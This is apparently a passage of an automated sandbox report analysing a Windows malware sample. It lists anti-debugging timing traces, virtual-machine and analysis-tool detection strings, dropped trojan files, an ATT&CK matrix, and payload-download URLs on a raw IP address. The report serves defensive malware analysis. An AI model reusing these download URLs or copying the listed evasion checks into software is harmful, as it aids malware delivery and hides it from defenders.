Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D416EC second address: 4D41724 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9DF4F36022h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esi+34h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F9DF4F36029h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D41724 second address: 4D4172A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D4172A second address: 4D4175F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, ax 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+34h], eax 0x0000000c jmp 00007F9DF4F36020h 0x00000011 test ecx, 00000700h 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a jmp 00007F9DF4F3601Dh 0x0000001f mov ebx, eax 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D4175F second address: 4D417DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF58A6BDDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F9E67D24B7Dh 0x0000000f pushad 0x00000010 jmp 00007F9DF58A6BDCh 0x00000015 pushfd 0x00000016 jmp 00007F9DF58A6BE2h 0x0000001b sbb eax, 60727A38h 0x00000021 jmp 00007F9DF58A6BDBh 0x00000026 popfd 0x00000027 popad 0x00000028 or dword ptr [edx+38h], FFFFFFFFh 0x0000002c jmp 00007F9DF58A6BE6h 0x00000031 or dword ptr [edx+3Ch], FFFFFFFFh 0x00000035 jmp 00007F9DF58A6BE0h 0x0000003a or dword ptr [edx+40h], FFFFFFFFh 0x0000003e pushad 0x0000003f pushad 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D417DF second address: 4D417E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D417E9 second address: 4D41808 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pop esi 0x00000007 jmp 00007F9DF58A6BDEh 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov al, bh 0x00000012 movzx ecx, bx 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D41808 second address: 4D4181C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F9DF4F3601Eh 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D4181C second address: 4D41830 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 leave 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F9DF58A6BDAh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D901A2 second address: 4D90219 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF4F36021h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F9DF4F3601Eh 0x0000000f push eax 0x00000010 jmp 00007F9DF4F3601Bh 0x00000015 xchg eax, ebp 0x00000016 jmp 00007F9DF4F36026h 0x0000001b mov ebp, esp 0x0000001d pushad 0x0000001e push ecx 0x0000001f mov ax, di 0x00000022 pop ebx 0x00000023 push eax 0x00000024 push edx 0x00000025 pushfd 0x00000026 jmp 00007F9DF4F36024h 0x0000002b adc si, 7DD8h 0x00000030 jmp 00007F9DF4F3601Bh 0x00000035 popfd 0x00000036 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D20F0B second address: 4D20F11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D20F11 second address: 4D20F15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D20F15 second address: 4D20F4A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF58A6BDDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F9DF58A6BDEh 0x00000011 push eax 0x00000012 jmp 00007F9DF58A6BDBh 0x00000017 xchg eax, ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D20F4A second address: 4D20F65 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF4F36027h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D41875 second address: 4D418B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 movzx ecx, bx 0x00000009 popad 0x0000000a push esi 0x0000000b jmp 00007F9DF58A6BE8h 0x00000010 mov dword ptr [esp], ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F9DF58A6BE7h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D418B4 second address: 4D4191A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF4F36029h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e call 00007F9DF4F36023h 0x00000013 pop esi 0x00000014 pushfd 0x00000015 jmp 00007F9DF4F36029h 0x0000001a sbb ch, FFFFFF86h 0x0000001d jmp 00007F9DF4F36021h 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D419D8 second address: 4D41875 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 1A82154Ah 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c jmp 00007F9DF58A6BDCh 0x00000011 retn 0008h 0x00000014 push 0042F258h 0x00000019 push edi 0x0000001a mov dword ptr [00434D64h], eax 0x0000001f call esi 0x00000021 mov edi, edi 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F9DF58A6BE2h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D803DF second address: 4D803E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeSpecial instruction interceptor: First address: 81CF00 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeSpecial instruction interceptor: First address: 9BC349 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeSpecial instruction interceptor: First address: 9BAE2B instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_00A930C8 rdtsc 0_2_00A930C8
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeWindow / User API: threadDelayed 1259Jump to behavior
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeWindow / User API: threadDelayed 1741Jump to behavior
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeWindow / User API: threadDelayed 1711Jump to behavior
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeWindow / User API: threadDelayed 1753Jump to behavior
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\VwweWtdD5CJ\Y-Cleaner.exeJump to dropped file
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\dll[1]Jump to dropped file
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\soft[1]Jump to dropped file
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\VwweWtdD5CJ\Bunifu_UI_v1.5.3.dllJump to dropped file
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe TID: 7416Thread sleep count: 59 > 30Jump to behavior
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe TID: 7416Thread sleep time: -118059s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe TID: 7388Thread sleep count: 1259 > 30Jump to behavior
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe TID: 7388Thread sleep time: -2519259s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe TID: 7336Thread sleep count: 60 > 30Jump to behavior
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe TID: 7336Thread sleep count: 86 > 30Jump to behavior
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe TID: 7336Thread sleep count: 74 > 30Jump to behavior
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe TID: 7336Thread sleep count: 91 > 30Jump to behavior
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe TID: 7336Thread sleep count: 86 > 30Jump to behavior
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe TID: 7336Thread sleep count: 186 > 30Jump to behavior
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe TID: 7336Thread sleep count: 184 > 30Jump to behavior
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe TID: 7336Thread sleep count: 171 > 30Jump to behavior
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe TID: 7336Thread sleep count: 121 > 30Jump to behavior
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe TID: 7496Thread sleep time: -32000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe TID: 7404Thread sleep count: 1741 > 30Jump to behavior
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe TID: 7404Thread sleep time: -3483741s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe TID: 7408Thread sleep count: 1711 > 30Jump to behavior
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe TID: 7408Thread sleep time: -3423711s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe TID: 7396Thread sleep count: 1753 > 30Jump to behavior
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe TID: 7396Thread sleep time: -3507753s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe TID: 7392Thread sleep count: 292 > 30Jump to behavior
Source: C:\Users\user\Desktop\zSmMqGGeVy.exe TID: 7392Thread sleep time: -584292s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_00415D07 FindFirstFileExW,0_2_00415D07
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_10007EA9 FindFirstFileExW,0_2_10007EA9
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_00EA5F6E FindFirstFileExW,0_2_00EA5F6E
Source: zSmMqGGeVy.exe, zSmMqGGeVy.exe, 00000000.00000002.2597807409.000000000099B000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: Amcache.hve.9.drBinary or memory string: VMware
Source: Amcache.hve.9.drBinary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.9.drBinary or memory string: vmci.syshbin
Source: Amcache.hve.9.drBinary or memory string: VMware, Inc.
Source: Amcache.hve.9.drBinary or memory string: VMware20,1hbin@
Source: Amcache.hve.9.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.9.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.9.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: zSmMqGGeVy.exe, 00000000.00000002.2600833623.0000000005665000.00000004.00000020.00020000.00000000.sdmp, zSmMqGGeVy.exe, 00000000.00000002.2598480313.0000000000E65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: Amcache.hve.9.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: zSmMqGGeVy.exe, 00000000.00000003.2261056249.00000000056B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\4
Source: Amcache.hve.9.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.9.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.9.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.9.drBinary or memory string: vmci.sys
Source: Amcache.hve.9.drBinary or memory string: vmci.syshbin`
Source: Amcache.hve.9.drBinary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.9.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.9.drBinary or memory string: VMware20,1
Source: Amcache.hve.9.drBinary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.9.drBinary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.9.drBinary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.9.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.9.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.9.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.9.drBinary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.9.drBinary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.9.drBinary or memory string: VMware Virtual RAM
Source: Amcache.hve.9.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: zSmMqGGeVy.exe, 00000000.00000002.2597807409.000000000099B000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: Amcache.hve.9.drBinary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
Source: Amcache.hve.9.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeSystem information queried: ModuleInformationJump to behavior
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeThread information set: HideFromDebuggerJump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeOpen window title or class name: regmonclass
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeOpen window title or class name: gbdyllo
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeOpen window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeOpen window title or class name: ollydbg
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeOpen window title or class name: filemonclass
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeFile opened: NTICE
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeFile opened: SICE
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeFile opened: SIWVID
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_00A930C8 rdtsc 0_2_00A930C8
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_0040C0B3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0040C0B3
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_00402950 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,0_2_00402950
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_0041366F mov eax, dword ptr fs:[00000030h]0_2_0041366F
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_0040EF0D mov eax, dword ptr fs:[00000030h]0_2_0040EF0D
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_10007A76 mov eax, dword ptr fs:[00000030h]0_2_10007A76
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_10005F25 mov eax, dword ptr fs:[00000030h]0_2_10005F25
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_00DA9D3B push dword ptr fs:[00000030h]0_2_00DA9D3B
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_00EA38D6 mov eax, dword ptr fs:[00000030h]0_2_00EA38D6
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_00E9F174 mov eax, dword ptr fs:[00000030h]0_2_00E9F174
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_00E9092B mov eax, dword ptr fs:[00000030h]0_2_00E9092B
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_00E90D90 mov eax, dword ptr fs:[00000030h]0_2_00E90D90
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_00402C70 SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,0_2_00402C70
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_0040C0B3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0040C0B3
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_00409949 SetUnhandledExceptionFilter,0_2_00409949
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_00408ED5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00408ED5
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_004097B2 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004097B2
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_10002ADF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_10002ADF
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_100056A0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_100056A0
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_10002FDA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_10002FDA
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_00E9913C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00E9913C
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_00E99A19 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00E99A19
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_00E99BB0 SetUnhandledExceptionFilter,0_2_00E99BB0
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_00E9C31A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00E9C31A
Source: zSmMqGGeVy.exe, zSmMqGGeVy.exe, 00000000.00000002.2597807409.000000000099B000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_004099B3 cpuid 0_2_004099B3
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeCode function: 0_2_00409BE5 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00409BE5
Source: Amcache.hve.9.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.9.drBinary or memory string: msmpeng.exe
Source: Amcache.hve.9.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.9.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.9.drBinary or memory string: MsMpEng.exe

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts3
Command and Scripting Interpreter		1
DLL Side-Loading		2
Process Injection		11
Masquerading		OS Credential Dumping1
System Time Discovery		Remote Services1
Archive Collected Data		2
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		24
Virtualization/Sandbox Evasion		LSASS Memory781
Security Software Discovery		Remote Desktop ProtocolData from Removable Media12
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)2
Process Injection		Security Account Manager24
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Deobfuscate/Decode Files or Information		NTDS3
Process Discovery		Distributed Component Object ModelInput Capture12
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
Obfuscated Files or Information		LSA Secrets1
Application Window Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts13
Software Packing		Cached Domain Credentials2
File and Directory Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Timestomp		DCSync223
System Information Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
DLL Side-Loading		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
zSmMqGGeVy.exe37%ReversingLabsWin32.Malware.BluWin
zSmMqGGeVy.exe100%AviraHEUR/AGEN.1320706
zSmMqGGeVy.exe100%Joe Sandbox ML

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\soft[1]100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\VwweWtdD5CJ\Y-Cleaner.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\dll[1]0%ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\soft[1]75%ReversingLabsByteCode-MSIL.Trojan.Malgent
C:\Users\user\AppData\Local\Temp\VwweWtdD5CJ\Bunifu_UI_v1.5.3.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\VwweWtdD5CJ\Y-Cleaner.exe75%ReversingLabsByteCode-MSIL.Trojan.Malgent

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
s-part-0035.t-0009.t-msedge.net
13.107.246.63
truefalse
    		high
    time.windows.com
    		unknown
    		unknownfalse
      		high

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://185.156.73.23/files/downloadfalse
        		unknown
        http://185.156.73.23/dll/keyfalse
          		unknown
          http://185.156.73.23/soft/downloadfalse
            		unknown
            http://185.156.73.23/add?substr=mixtwo&s=three&sub=empfalse
              		unknown
              http://185.156.73.23/dll/downloadfalse
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://upx.sf.netAmcache.hve.9.drfalse
                  		high
